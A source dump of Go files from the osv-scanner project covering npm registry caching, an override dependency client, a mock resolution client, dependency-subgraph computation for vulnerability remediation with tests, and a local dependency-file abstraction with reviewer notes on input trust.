resolve.Concrete, }, } } return resolve.MatchRequirement(vk, resVersions), nil } func isNpmBundle(pk resolve.PackageKey) bool { // Bundles are represented in resolution with a 'mangled' name containing its origin e.g. "root-pkg>1.0.0>bundled-package" // '>' is not a valid character for a npm package, so it'll only be found here. 
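	return strings.Contains(pk.Name, ">")
}

// AddRegistries is a no-op for this client; it always returns nil.
func (c *NpmRegistryClient) AddRegistries(_ []Registry) error { return nil }

// WriteCache gob-encodes the registry API client into path + npmRegistryCacheExt.
//
// os.Create creates the file or truncates an existing one at that path, which is
// derived from the manifest location and so lies inside the scanned directory.
func (c *NpmRegistryClient) WriteCache(path string) (err error) {
	f, err := os.Create(path + npmRegistryCacheExt)
	if err != nil {
		return err
	}
	// A failed Close on a written file can mean the data never reached disk, so
	// report it unless encoding already failed.
	defer func() {
		if cerr := f.Close(); err == nil {
			err = cerr
		}
	}()

	return gob.NewEncoder(f).Encode(c.api)
}

// LoadCache gob-decodes path + npmRegistryCacheExt into the registry API client.
//
// The file is read from beside the manifest and is not checked for origin or
// integrity here; in an untrusted checkout its contents are author-controlled.
// NOTE(review): confirm how NpmRegistryAPIClient validates and bounds what it
// decodes, and whether cached entries can stand in for live registry answers.
func (c *NpmRegistryClient) LoadCache(path string) error {
	f, err := os.Open(path + npmRegistryCacheExt)
	if err != nil {
		return err
	}
	defer f.Close()

	return gob.NewDecoder(f).Decode(&c.api)
}

================================================
FILE: internal/resolution/client/override_client.go
================================================
package client

import (
	"context"
	"slices"

	"deps.dev/util/resolve"
)

// OverrideClient wraps a DependencyClient, allowing for custom packages & versions to be added
//
// The two maps are read and written without locking.
// NOTE(review): confirm AddVersion is never called while lookups on the same
// client may be running in other goroutines.
type OverrideClient struct {
	DependencyClient

	// Can't quite reuse resolve.LocalClient because it automatically creates dependencies
	pkgVers map[resolve.PackageKey][]resolve.Version            // versions of a package
	verDeps map[resolve.VersionKey][]resolve.RequirementVersion // dependencies of a version
}

// NewOverrideClient wraps c with empty override maps.
func NewOverrideClient(c DependencyClient) *OverrideClient {
	return &OverrideClient{
		DependencyClient: c,
		pkgVers:          make(map[resolve.PackageKey][]resolve.Version),
		verDeps:          make(map[resolve.VersionKey][]resolve.RequirementVersion),
	}
}

// AddVersion registers v as an available version of its package and records a
// copy of deps as its requirements. Versions for a package are kept sorted using
// v's semver system; adding a version that is already present does not duplicate
// it but does replace its recorded requirements.
func (c *OverrideClient) AddVersion(v resolve.Version, deps []resolve.RequirementVersion) {
	// TODO: Inserting multiple co-dependent requirements may not work, depending on order
	versions := c.pkgVers[v.PackageKey]
	sem := v.Semver()
	// Only add it to the versions if not already there (and keep versions sorted)
	idx, ok := slices.BinarySearchFunc(versions, v, func(a, b resolve.Version) int {
		return sem.Compare(a.Version, b.Version)
	})
	if !ok {
		versions = slices.Insert(versions, idx, v)
	}
	c.pkgVers[v.PackageKey] = versions
	c.verDeps[v.VersionKey] = slices.Clone(deps) // overwrites dependencies if called multiple times with same version
}

func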
(c *OverrideClient) Version(ctx context.Context, vk resolve.VersionKey) (resolve.Version, error) { for _, v := range c.pkgVers[vk.PackageKey] { if v.VersionKey == vk { return v, nil } } return c.DependencyClient.Version(ctx, vk) } func (c *OverrideClient) Versions(ctx context.Context, pk resolve.PackageKey) ([]resolve.Version, error) { if vers, ok := c.pkgVers[pk]; ok { return vers, nil } return c.DependencyClient.Versions(ctx, pk) } func (c *OverrideClient) Requirements(ctx context.Context, vk resolve.VersionKey) ([]resolve.RequirementVersion, error) { if deps, ok := c.verDeps[vk]; ok { return deps, nil } return c.DependencyClient.Requirements(ctx, vk) } func (c *OverrideClient) MatchingVersions(ctx context.Context, vk resolve.VersionKey) ([]resolve.Version, error) { if vs, ok := c.pkgVers[vk.PackageKey]; ok { return resolve.MatchRequirement(vk, vs), nil } return c.DependencyClient.MatchingVersions(ctx, vk) } ================================================ FILE: internal/resolution/clienttest/mock_resolution_client.go ================================================ // Package clienttest provides a mock resolution client for testing. package clienttest import ( "context" "encoding/json" "os" "strings" "testing" "deps.dev/util/resolve" "deps.dev/util/resolve/schema" "github.com/goccy/go-yaml" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scanner/v2/internal/clients/clientimpl/localmatcher" "github.com/google/osv-scanner/v2/internal/resolution/client" "github.com/ossf/osv-schema/bindings/go/osvschema" "google.golang.org/protobuf/encoding/protojson" ) type ResolutionUniverse struct { System string `yaml:"system"` Schema string `yaml:"schema"` } type VulnerabilityMatcher struct { Vulns []*osvschema.Vulnerability `json:"vulns"` } // UnmarshalJSON unmarshals the mock vulns. The Vulnerability field is a proto // message, so it needs to be unmarshaled with protojson. 
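func (vm *VulnerabilityMatcher) UnmarshalJSON(data []byte) error {
	// Decode only the outer object with encoding/json; each element stays raw so
	// it can be handed to protojson below.
	var raw map[string][]json.RawMessage
	if err := json.Unmarshal(data, &raw); err != nil {
		return err
	}
	// Entries are appended to whatever vm.Vulns already holds.
	for _, v := range raw["vulns"] {
		// A literal JSON null is kept as a nil entry rather than dropped.
		if string(v) == "null" {
			vm.Vulns = append(vm.Vulns, nil)
			continue
		}
		vuln := &osvschema.Vulnerability{}
		if err := protojson.Unmarshal(v, vuln); err != nil {
			return err
		}
		vm.Vulns = append(vm.Vulns, vuln)
	}

	return nil
}

// MatchVulnerabilities returns one result slice per entry of pkgs, in the same
// order, each produced by localmatcher.VulnerabilitiesAffectingPackage over the
// loaded mock vulnerabilities. The returned error is always nil.
func (vm *VulnerabilityMatcher) MatchVulnerabilities(_ context.Context, pkgs []*extractor.Package) ([][]*osvschema.Vulnerability, error) {
	result := make([][]*osvschema.Vulnerability, len(pkgs))
	for i, pkg := range pkgs {
		result[i] = localmatcher.VulnerabilitiesAffectingPackage(vm.Vulns, pkg)
	}

	return result, nil
}

// mockDependencyClient wraps a resolve.LocalClient and adds cache and registry
// methods that do nothing and return nil.
type mockDependencyClient struct {
	*resolve.LocalClient
}

func (mdc mockDependencyClient) LoadCache(string) error                  { return nil }
func (mdc mockDependencyClient) WriteCache(string) error                 { return nil }
func (mdc mockDependencyClient) AddRegistries(_ []client.Registry) error { return nil }

// NewMockResolutionClient builds a client.ResolutionClient for tests.
//
// vulnJSON is the path of a JSON file decoded into a VulnerabilityMatcher, and
// universeYaml is the path of a YAML file decoded into a ResolutionUniverse
// (ecosystem name plus a resolve schema). Any failure ends the test through
// t.Fatalf.
func NewMockResolutionClient(t *testing.T, universeYaml, vulnJSON string) client.ResolutionClient {
	t.Helper()

	vulnFile, err := os.Open(vulnJSON)
	if err != nil {
		t.Fatalf("failed reading mock vulnerability file: %v", err)
	}
	// Each file gets its own handle and its own deferred Close; reusing one
	// variable for both files would leave the first handle open.
	defer vulnFile.Close()

	var vm VulnerabilityMatcher
	if err := json.NewDecoder(vulnFile).Decode(&vm); err != nil {
		t.Fatalf("failed decoding mock vulns: %v", err)
	}

	cl := client.ResolutionClient{
		VulnerabilityMatcher: &vm,
	}

	universeFile, err := os.Open(universeYaml)
	if err != nil {
		t.Fatalf("failed opening mock universe: %v", err)
	}
	defer universeFile.Close()

	dec := yaml.NewDecoder(universeFile)

	var universe ResolutionUniverse
	if err := dec.Decode(&universe); err != nil {
		t.Fatalf("failed decoding mock universe: %v", err)
	}

	var sys resolve.System
	switch strings.ToLower(universe.System) {
	case "npm":
		sys = resolve.NPM
	case "maven":
		sys = resolve.Maven
	default:
		t.Fatalf("unknown ecosystem in universe: %s", universe.System)
	}

	// schema needs a strict tab indentation, which is awkward to do within the YAML.
	// Replace double space from yaml with single tab
	universe.Schema = strings.ReplaceAll(universe.Schema, "  ", "\t")
	sch, err := schema.New(universe.Schema, sys)
	if err != nil {
		t.Fatalf("failed parsing schema: %v", err)
	}

	cl.DependencyClient = mockDependencyClient{sch.NewClient()}

	return cl
}

================================================ FILE: internal/resolution/dependency_subgraph.go ================================================
package resolution

import (
	"context"
	"slices"

	"deps.dev/util/resolve"
	"deps.dev/util/resolve/dep"
	"github.com/google/osv-scanner/v2/internal/resolution/manifest"
	"github.com/google/osv-scanner/v2/internal/resolution/util"
	"github.com/google/osv-scanner/v2/internal/utility/vulns"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
)

// GraphNode is one node of a DependencySubgraph, together with the edges that
// connect it to the rest of that subgraph.
type GraphNode struct {
	Version  resolve.VersionKey
	Distance int            // The shortest distance to the end Dependency Node (which has a Distance of 0)
	Parents  []resolve.Edge // Parent edges i.e. with Edge.To == this ID
	Children []resolve.Edge // Child edges i.e. with Edge.From == this ID
}

// DependencySubgraph holds the nodes of a resolved graph that lead to one
// dependency, keyed by their NodeID in the original graph.
type DependencySubgraph struct {
	Dependency resolve.NodeID // The NodeID of the end dependency of this subgraph.
	Nodes      map[resolve.NodeID]GraphNode
}

// ComputeSubgraphs computes the DependencySubgraphs for each specified NodeID.
// The computed Subgraphs contains all nodes and edges that transitively depend on the specified node, and the node itself.
//
// Modifying any of the returned DependencySubgraphs may cause unexpected behaviour.
func ComputeSubgraphs(g *resolve.Graph, nodes []resolve.NodeID) []*DependencySubgraph {
	// Find the parent nodes of each node in graph, for easier traversal.
	// These slices are shared between the returned subgraphs.
	parentEdges := make(map[resolve.NodeID][]resolve.Edge)
	for _, e := range g.Edges {
		// Check for a self-dependency, just in case.
		if e.From == e.To {
			continue
		}
		parentEdges[e.To] = append(parentEdges[e.To], e)
	}

	// For each node, compute the subgraph.
	subGraphs := make([]*DependencySubgraph, 0, len(nodes))
	for _, nodeID := range nodes {
		// Starting at the node of interest, visit all unvisited parents,
		// adding the corresponding edges to the GraphNodes.
		gNodes := make(map[resolve.NodeID]GraphNode)
		seen := make(map[resolve.NodeID]struct{})
		seen[nodeID] = struct{}{}
		toProcess := []resolve.NodeID{nodeID}
		currDistance := 0 // The current distance from end dependency.
		for len(toProcess) > 0 {
			// Track the next set of nodes to process, which will be +1 Distance away from end.
			var next []resolve.NodeID
			for _, node := range toProcess {
				// Construct the GraphNode
				parents := parentEdges[node]
				gNode := gNodes[node] // Grab the existing GraphNode, which will have some Children populated.
				gNode.Version = g.Nodes[node].Version
				gNode.Distance = currDistance
				gNode.Parents = parents
				gNodes[node] = gNode
				// Populate parent's children and add to next set.
				for _, edge := range parents {
					nID := edge.From
					pNode := gNodes[nID]
					pNode.Children = append(pNode.Children, edge)
					gNodes[nID] = pNode
					if _, ok := seen[nID]; !ok {
						seen[nID] = struct{}{}
						next = append(next, nID)
					}
				}
			}
			toProcess = next
			currDistance++
		}

		subGraphs = append(subGraphs, &DependencySubgraph{
			Dependency: nodeID,
			Nodes:      gNodes,
		})
	}

	return subGraphs
}

// IsDevOnly checks if this DependencySubgraph solely contains dev (or test) dependencies.
// If groups is nil, checks the dep.Type of the direct graph edges for the Dev Attr (for in-place).
// Otherwise, uses the groups of the direct dependencies to determine if a non-dev path exists (for relax/override).
//
// The direct dependencies are the Children of node 0. With groups set, a
// direct dependency of any system other than npm or Maven counts as non-dev,
// so the result for such a subgraph is false.
func (ds *DependencySubgraph) IsDevOnly(groups map[manifest.RequirementKey][]string) bool {
	if groups != nil {
		// Check if any of the direct dependencies are not in the dev group.
		return !slices.ContainsFunc(ds.Nodes[0].Children, func(e resolve.Edge) bool {
			req := resolve.RequirementVersion{
				VersionKey: ds.Nodes[e.To].Version,
				Type:       e.Type.Clone(),
			}
			reqGroups := groups[manifest.MakeRequirementKey(req)]
			switch req.System {
			case resolve.NPM:
				return !slices.Contains(reqGroups, "dev")
			case resolve.Maven:
				return !slices.Contains(reqGroups, "test")
			case resolve.UnknownSystem:
				fallthrough
			default:
				return true
			}
		})
	}

	// groups == nil
	// Check if any of the direct dependencies do not have the Dev attr.
	for _, e := range ds.Nodes[0].Children {
		if e.Type.HasAttr(dep.Dev) {
			continue
		}
		// As a workaround for npm workspaces, check for the Dev attr in the direct dependency's dependencies.
		for _, e2 := range ds.Nodes[e.To].Children {
			if !e2.Type.HasAttr(dep.Dev) {
				return false
			}
		}
		// If the vulnerable dependency is a direct dependency, it'd have no Children.
		// Since we've already checked that it doesn't have the Dev attr, it must be a non-dev dependency.
		if e.To == ds.Dependency {
			return false
		}
	}

	return true
}

// ConstrainingSubgraph tries to construct a subgraph of the subgraph that includes only the edges that contribute to a vulnerability.
// It identifies the dependencies which constrain the vulnerable package to use a vulnerable version.
// This is used by the 'relax' remediation strategy to identify which direct dependencies need to be updated.
//
// e.g. for a subgraph with:
//
//	A -> C@<2.0
//	B -> C@<3.0
//	C resolves to C@1.9
//
// If the vuln affecting C is fixed in version 2.0, the constraining subgraph would only contain A,
// since B would allow versions >=2.0 of C to be selected if not for A.
//
// This is a heuristic approach and may produce false positives (meaning possibly unnecessary dependencies would be flagged to be relaxed).
// If the constraining subgraph cannot be computed for some reason, returns the original DependencySubgraph.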
func (ds *DependencySubgraph) ConstrainingSubgraph(ctx context.Context, cl resolve.Client, vuln *osvschema.Vulnerability) *DependencySubgraph {
	// Just check if the direct requirement of the vulnerable package is constraining it.
	// This still has some false positives.
	// e.g. if we have
	// A@* -> B@2.*
	// D@* -> B@2.1.1 -> C@1.0.0
	// resolving both together picks B@2.1.1 & thus constrains C to C@1.0.0 for A
	// But resolving A alone could pick B@2.2.0 which might not depend on C
	// Similarly, a direct dependency could be constrained by an indirect dependency with similar results.
	end := ds.Nodes[ds.Dependency]
	newParents := make([]resolve.Edge, 0, len(end.Parents))
	for _, pEdge := range end.Parents {
		// Check if the latest allowable version of the package is vulnerable
		vk := end.Version
		vk.Version = pEdge.Requirement
		vk.VersionType = resolve.Requirement
		vers, err := cl.MatchingVersions(ctx, vk)
		if err != nil || len(vers) == 0 {
			// Could not determine MatchingVersions - assume this is constraining.
			// A failed or empty lookup therefore keeps the edge in the result
			// instead of dropping it.
			newParents = append(newParents, pEdge)
			continue
		}
		// NOTE(review): taking the last element relies on MatchingVersions
		// returning versions in ascending order - confirm for systems other than npm.
		bestVK := vers[len(vers)-1] // This should be the highest version for npm
		if vulns.IsAffected(vuln, util.VKToPackageInfo(bestVK.VersionKey)) {
			newParents = append(newParents, pEdge)
		}
	}

	if len(newParents) == 0 {
		// There has to be at least one constraining path for the vulnerability to appear.
		// If our heuristic couldn't determine any, treat the whole subgraph as constraining.
		return ds
	}

	// Rebuild the DependencySubgraph using the dependency's newParents.
	// Same logic as in ComputeSubgraphs.
	newNodes := make(map[resolve.NodeID]GraphNode)
	newNodes[ds.Dependency] = GraphNode{
		Version:  end.Version,
		Distance: 0,
		Parents:  newParents,
	}

	seen := make(map[resolve.NodeID]struct{})
	seen[ds.Dependency] = struct{}{}
	toProcess := make([]resolve.NodeID, 0, len(newParents))
	for _, e := range newParents {
		toProcess = append(toProcess, e.From)
		seen[e.From] = struct{}{}
	}

	currDistance := 1
	for len(toProcess) > 0 {
		var next []resolve.NodeID
		for _, nID := range toProcess {
			oldNode := ds.Nodes[nID]
			// The edge slices are cloned, so the DeleteFunc calls below do not
			// modify the slices held by ds.
			newNode := GraphNode{
				Version:  oldNode.Version,
				Distance: currDistance,
				Parents:  slices.Clone(oldNode.Parents),
				Children: slices.Clone(oldNode.Children),
			}
			// Remove the non-constraining edge from the node's children if it ends up in the subgraph.
			newNode.Children = slices.DeleteFunc(newNode.Children, func(e resolve.Edge) bool {
				if e.To != ds.Dependency {
					return false
				}

				return !slices.ContainsFunc(newParents, func(pEdge resolve.Edge) bool {
					return pEdge.From == e.From &&
						pEdge.Requirement == e.Requirement &&
						pEdge.Type.Compare(e.Type) == 0
				})
			})
			newNodes[nID] = newNode
			for _, e := range newNode.Parents {
				if _, ok := seen[e.From]; !ok {
					seen[e.From] = struct{}{}
					next = append(next, e.From)
				}
			}
		}
		toProcess = next
		currDistance++
	}

	// Remove children edges to nodes that are not in the computed subgraph.
	for nID, edge := range newNodes {
		edge.Children = slices.DeleteFunc(edge.Children, func(e resolve.Edge) bool {
			_, ok := seen[e.To]
			return !ok
		})
		newNodes[nID] = edge
	}

	return &DependencySubgraph{
		Dependency: ds.Dependency,
		Nodes:      newNodes,
	}
}

================================================ FILE: internal/resolution/dependency_subgraph_test.go ================================================
package resolution_test

import (
	"cmp"
	"maps"
	"slices"
	"testing"

	"deps.dev/util/resolve"
	"deps.dev/util/resolve/schema"
	gocmp "github.com/google/go-cmp/cmp"
	"github.com/google/osv-scanner/v2/internal/resolution"
	"github.com/google/osv-scanner/v2/internal/resolution/manifest"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
)

// TestDependencySubgraph computes a subgraph for every node of the test graph
// except node 0 and runs the structural checks on each one.
func TestDependencySubgraph(t *testing.T) {
	t.Parallel()
	// NOTE(review): the graph literals in this file appear here on a single
	// line; presumably the resolve schema they are parsed with depends on line
	// breaks and indentation, which this listing does not show - confirm
	// against the repository before reusing them.
	g, err := schema.ParseResolve(` a 0.0.1 b@^1.0.1 1.0.1 $c@^1.0.0 d: d@^2.2.2 2.2.2 c: c@^1.0.2 1.0.2 e@1.0.0 1.0.0 $d@^2.0.0 f@^1.1.1 1.1.1 $c@^1.0.1 g@^2.2.2 2.2.2 h@^3.3.3 3.3.3 $d@^2.2.0 `, resolve.NPM)
	if err != nil {
		t.Fatalf("failed to parse test graph: %v", err)
	}
	// Every node ID from 1 upwards; node 0 is skipped.
	nodes := make([]resolve.NodeID, len(g.Nodes)-1)
	for i := range nodes {
		nodes[i] = resolve.NodeID(i + 1)
	}

	subgraphs := resolution.ComputeSubgraphs(g, nodes)
	for _, sg := range subgraphs {
		checkSubgraphVersions(t, sg, g)
		checkSubgraphEdges(t, sg)
		checkSubgraphNodesReachable(t, sg)
		checkSubgraphDistances(t, sg)
	}
}

// TestConstrainingSubgraph checks that ConstrainingSubgraph drops the parents
// whose requirement would admit a fixed version, keeps the rest, and returns
// the same result when applied to its own output.
func TestConstrainingSubgraph(t *testing.T) {
	t.Parallel()
	const vulnPkgName = "vuln"
	g, err := schema.ParseResolve(` root 1.0.0 vuln: vuln@<3 1.0.1 nonprob1@^1.0.0 1.0.0 $vuln@>1 prob1@^1.0.0 1.0.0 $vuln@^1.0.0 prob2@^2.0.0 2.0.0 nonprob2@* 1.0.0 $vuln@* $vuln@* dep@3.0.0 3.0.0 $vuln@1.0.1 `, resolve.NPM)
	if err != nil {
		t.Fatalf("failed to parse test graph: %v", err)
	}
	nID := slices.IndexFunc(g.Nodes, func(n resolve.Node) bool { return n.Version.Name == vulnPkgName })
	if nID < 0 {
		t.Fatalf("failed to find vulnerable node in test graph")
	}
	subgraph := resolution.ComputeSubgraphs(g, []resolve.NodeID{resolve.NodeID(nID)})[0]

	// The local client knows three versions of the vulnerable package; the
	// vulnerability below is fixed in the last of them.
	cl := resolve.NewLocalClient()
	v := resolve.Version{
		VersionKey: resolve.VersionKey{
			PackageKey: resolve.PackageKey{
				System: resolve.NPM,
				Name:   vulnPkgName,
			},
			VersionType: resolve.Concrete,
		},
	}
	v.Version = "1.0.0"
	cl.AddVersion(v, []resolve.RequirementVersion{})
	v.Version = "1.0.1"
	cl.AddVersion(v, []resolve.RequirementVersion{})
	v.Version = "2.0.0"
	cl.AddVersion(v, []resolve.RequirementVersion{})
	vuln := &osvschema.Vulnerability{
		Id: "VULN-001",
		Affected: []*osvschema.Affected{{
			Package: &osvschema.Package{
				Ecosystem: "npm",
				Name:      vulnPkgName,
			},
			Ranges: []*osvschema.Range{
				{
					Type:   osvschema.Range_SEMVER,
					Events: []*osvschema.Event{{Introduced: "0"}, {Fixed: "2.0.0"}},
				},
			},
		},
		}}
	got := subgraph.ConstrainingSubgraph(t.Context(), cl, vuln)
	checkSubgraphVersions(t, got, g)
	checkSubgraphEdges(t, got)
	checkSubgraphNodesReachable(t, got)
	checkSubgraphDistances(t, got)

	// Checking that we have the expected remaining nodes
	expectedRemoved := []string{"nonprob1", "nonprob2"}
	for _, pkgName := range expectedRemoved {
		nID := slices.IndexFunc(g.Nodes, func(n resolve.Node) bool { return n.Version.Name == pkgName })
		if nID < 0 {
			t.Fatalf("failed to find expected node in test graph")
		}
		if _, found := got.Nodes[resolve.NodeID(nID)]; found {
			t.Errorf("non-constraining node was not removed from constraining subgraph: %s", pkgName)
		}
	}

	if len(got.Nodes) != len(subgraph.Nodes)-len(expectedRemoved) {
		t.Errorf("extraneous nodes found in constraining subgraph")
	}

	for nID := range got.Nodes {
		if _, ok := subgraph.Nodes[nID]; !ok {
			t.Errorf("extraneous node (%v) found in constraining subgraph", nID)
		}
	}

	// Check that ConstrainingSubgraph is stable if reapplied
	again := got.ConstrainingSubgraph(t.Context(), cl, vuln)
	if diff := gocmp.Diff(got, again); diff != "" {
		t.Errorf("ConstrainingSubgraph output changed on reapply (-want +got):\n%s", diff)
	}
}

// TestSubgraphIsDevOnly exercises IsDevOnly on one subgraph that has a non-dev
// path and one that does not, first with nil groups and then with a groups map.
func TestSubgraphIsDevOnly(t *testing.T) {
	t.Parallel()
	g, err := schema.ParseResolve(` a 1.0.0 b@1.0.0 1.0.0 prod: prod@1.0.0 1.0.0 Dev|c@1.0.0 1.0.0 $prod@1.0.0 dev: dev@1.0.0 1.0.0 Dev|d@1.0.0 1.0.0 $dev@1.0.0 `, resolve.NPM)
	if err != nil {
		t.Fatalf("failed to parse test graph: %v", err)
	}
	prodID := slices.IndexFunc(g.Nodes, func(n resolve.Node) bool { return n.Version.Name == "prod" })
	if prodID < 0 {
		t.Fatalf("failed to find vulnerable node in test graph")
	}
	devID := slices.IndexFunc(g.Nodes, func(n resolve.Node) bool { return n.Version.Name == "dev" })
	if devID < 0 {
		t.Fatalf("failed to find vulnerable node in test graph")
	}
	subgraphs := resolution.ComputeSubgraphs(g, []resolve.NodeID{resolve.NodeID(prodID), resolve.NodeID(devID)})
	prodGraph := subgraphs[0]
	devGraph := subgraphs[1]

	if prodGraph.IsDevOnly(nil) {
		t.Errorf("non-dev subgraph has IsDevOnly(nil) == true")
	}
	if !devGraph.IsDevOnly(nil) {
		t.Errorf("dev-only subgraph has IsDevOnly(nil) == false")
	}

	// Only "c" and "d" are listed, both in the "dev" group; "b" has no entry.
	groups := map[manifest.RequirementKey][]string{
		{PackageKey: resolve.PackageKey{System: resolve.NPM, Name: "c"}, EcosystemSpecific: ""}: {"dev"},
		{PackageKey: resolve.PackageKey{System: resolve.NPM, Name: "d"}, EcosystemSpecific: ""}: {"dev"},
	}
	if prodGraph.IsDevOnly(groups) {
		t.Errorf("non-dev subgraph has IsDevOnly(groups) == true")
	}
	if !devGraph.IsDevOnly(groups) {
		t.Errorf("dev-only subgraph has IsDevOnly(groups) == false")
	}
}

func checkSubgraphVersions(t *testing.T, sg *resolution.DependencySubgraph, g *resolve.Graph) {
	// Check that the nodes and versions in the subgraph are correct
	t.Helper()
	if _, ok := sg.Nodes[0]; !ok {
		t.Errorf("DependencySubgraph missing root node (0)")
	}
	if _, ok := sg.Nodes[sg.Dependency]; !ok {
		t.Errorf("DependencySubgraph missing Dependency node (%v)", sg.Dependency)
	}
	for nID, node := range sg.Nodes {
		// Bounds check before indexing g.Nodes with an ID taken from the subgraph.
		if nID < 0 || int(nID) >= len(g.Nodes) {
			t.Errorf("DependencySubgraph contains invalid node ID: %v", nID)
			continue
		}
		want := g.Nodes[nID].Version
		got := node.Version
		if diff := gocmp.Diff(want, got); diff != "" {
			t.Errorf("DependencySubgraph node %v does not match Graph (-want +got):\n%s", nID, diff)
		}
	}
}

func checkSubgraphEdges(t *testing.T, sg *resolution.DependencySubgraph) {
	// Check that every edge in a node's Parents appears in that parent's Children and vice versa.
	t.Helper()

	// Check the root node has no parents & end node has no children
	if root, ok := sg.Nodes[0]; !ok {
		t.Errorf("DependencySubgraph missing root node (0)")
	} else if len(root.Parents) != 0 {
		t.Errorf("DependencySubgraph root node (0) has parent nodes: %v", root.Parents)
	}
	if end, ok := sg.Nodes[sg.Dependency]; !ok {
		t.Errorf("DependencySubgraph missing Dependency node (%v)", sg.Dependency)
	} else if len(end.Children) != 0 {
		t.Errorf("DependencySubgraph Dependency node (%v) has child nodes: %v", sg.Dependency, end.Children)
	}

	// Two edges are the same when endpoints, requirement and type all match.
	edgeEq := func(a, b resolve.Edge) bool {
		return a.From == b.From &&
			a.To == b.To &&
			a.Requirement == b.Requirement &&
			a.Type.Compare(b.Type) == 0
	}

	// Check each node's parents/children for same edges
	for nID, node := range sg.Nodes {
		// Only the root node should have no parents
		if len(node.Parents) == 0 && nID != 0 {
			t.Errorf("DependencySubgraph node %v has no parent nodes", nID)
		}
		for _, e := range node.Parents {
			if e.To != nID {
				t.Errorf("DependencySubgraph node %v contains invalid parent edge: %v", nID, e)
				continue
			}
			parent, ok := sg.Nodes[e.From]
			if !ok {
				t.Errorf("DependencySubgraph edge missing node in subgraph: %v", e)
			}
			if !slices.ContainsFunc(parent.Children, func(edge resolve.Edge) bool { return edgeEq(e, edge) }) {
				t.Errorf("DependencySubgraph node %v missing child edge: %v", e.From, e)
			}
		}
		// Only the end node should have no children
		if len(node.Children) == 0 && nID != sg.Dependency {
			t.Errorf("DependencySubgraph node %v has no child nodes", nID)
		}
		for _, e := range node.Children {
			if e.From != nID {
				t.Errorf("DependencySubgraph node %v contains invalid child edge: %v", nID, e)
				continue
			}
			child, ok := sg.Nodes[e.To]
			if !ok {
				t.Errorf("DependencySubgraph edge missing node in subgraph: %v", e)
			}
			if !slices.ContainsFunc(child.Parents, func(edge resolve.Edge) bool { return edgeEq(e, edge) }) {
				t.Errorf("DependencySubgraph node %v missing parent edge: %v", e.To, e)
			}
		}
	}
}

func checkSubgraphNodesReachable(t *testing.T, sg *resolution.DependencySubgraph) {
	// Check that every node in the subgraph is reachable from the root node.
	t.Helper()
	// Queue-based walk over Children edges, starting at node 0.
	seen := make(map[resolve.NodeID]struct{})
	todo := make([]resolve.NodeID, 0, len(sg.Nodes))
	todo = append(todo, 0)
	seen[0] = struct{}{}
	for len(todo) > 0 {
		nID := todo[0]
		todo = todo[1:]
		node, ok := sg.Nodes[nID]
		if !ok {
			t.Errorf("DependencySubgraph missing expected node %v", nID)
			continue
		}
		for _, e := range node.Children {
			if _, ok := seen[e.To]; !ok {
				todo = append(todo, e.To)
				seen[e.To] = struct{}{}
			}
		}
	}

	got := slices.Sorted(maps.Keys(seen))
	want := slices.Sorted(maps.Keys(sg.Nodes))

	if diff := gocmp.Diff(want, got); diff != "" {
		t.Errorf("DependencySubgraph reachable nodes mismatch (-want +got):\n%s", diff)
	}
}

func checkSubgraphDistances(t *testing.T, sg *resolution.DependencySubgraph) {
	// Check that the distances of each node have the correct value.
	t.Helper()
	if end, ok := sg.Nodes[sg.Dependency]; !ok {
		t.Errorf("DependencySubgraph missing Dependency node (%v)", sg.Dependency)
	} else if end.Distance != 0 {
		t.Errorf("DependencySubgraph end Dependency distance is not 0")
	}

	// Each node's distance should be one more than its smallest child's distance.
	for nID, node := range sg.Nodes {
		// The end dependency should have a distance of 0
		if nID == sg.Dependency {
			if node.Distance != 0 {
				t.Errorf("DependencySubgraph Dependency node (%v) has nonzero distance: %d", nID, node.Distance)
			}

			continue
		}
		// slices.MinFunc panics on an empty slice, so report and skip instead.
		if len(node.Children) == 0 {
			t.Errorf("DependencySubgraph node %v has no child nodes", nID)
			continue
		}
		e := slices.MinFunc(node.Children, func(a, b resolve.Edge) int {
			return cmp.Compare(sg.Nodes[a.To].Distance, sg.Nodes[b.To].Distance)
		})
		want := sg.Nodes[e.To].Distance + 1
		if node.Distance != want {
			t.Errorf("DependencySubgraph node %v Distance = %d, want = %d", nID, node.Distance, want)
		}
	}
}

================================================ FILE: internal/resolution/depfile/depfile.go ================================================
// Package depfile provides a temporary abstraction for files that have been opened for extraction.
// TODO(michaelkedar): This is used for guided remediation, and will be removed after the migration to OSV-Scalibr is complete.
package depfile

import (
	"io"
	"os"
	"path/filepath"
)

// DepFile is an abstraction for a file that has been opened for extraction,
// and that knows how to open other DepFiles relative to itself.
type DepFile interface {
	io.Reader

	// Open opens a NestedDepFile based on the path of the
	// current DepFile if the provided path is relative.
	//
	// If the path is an absolute path, then it is opened absolutely.
	//
	// NOTE(review): this contract does not confine path to any directory.
	// A caller that derives path from the contents of a file it is scanning
	// should decide beforehand which locations it is willing to open.
	Open(path string) (NestedDepFile, error)

	// Path returns the path associated with this DepFile.
	Path() string
}

// NestedDepFile is an abstraction for a file that has been opened while extracting another file,
// and would need to be closed.
type NestedDepFile interface {
	io.Closer
	DepFile
}

// A LocalFile represents a file that exists on the local filesystem.
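type LocalFile struct {
	// TODO(rexpan): This should be *os.File, as that would allow us to access other underlying functions that definitely will exist
	io.ReadCloser

	// path is the location recorded by OpenLocalDepFile; relative Open calls
	// are resolved against its directory.
	path string
}

// Open opens path as a NestedDepFile. An absolute path is opened as given; any
// other path is joined onto the directory of this file.
//
// The path is not checked: an absolute path, or a relative one containing
// "..", resolves outside the directory of this file. Callers that take path
// from the contents of a scanned file are responsible for restricting it.
func (f LocalFile) Open(path string) (NestedDepFile, error) {
	if filepath.IsAbs(path) {
		return OpenLocalDepFile(path)
	}

	return OpenLocalDepFile(filepath.Join(filepath.Dir(f.path), path))
}

// Path returns the path recorded when the file was opened.
func (f LocalFile) Path() string { return f.path }

// OpenLocalDepFile opens the file at path for reading and records its absolute
// path. The caller must Close the returned file.
func OpenLocalDepFile(path string) (NestedDepFile, error) {
	r, err := os.Open(path)
	if err != nil {
		return LocalFile{}, err
	}

	// Very unlikely to have Abs return an error if the file opens correctly.
	// If it does, keep the path that was actually opened: Abs returns "" on
	// failure, and an empty path would make later relative Open calls resolve
	// against the working directory instead of this file's directory.
	if abs, absErr := filepath.Abs(path); absErr == nil {
		path = abs
	}

	return LocalFile{r, path}, nil
}

================================================ FILE: internal/resolution/lockfile/__snapshots__/npm_test.snap ================================================
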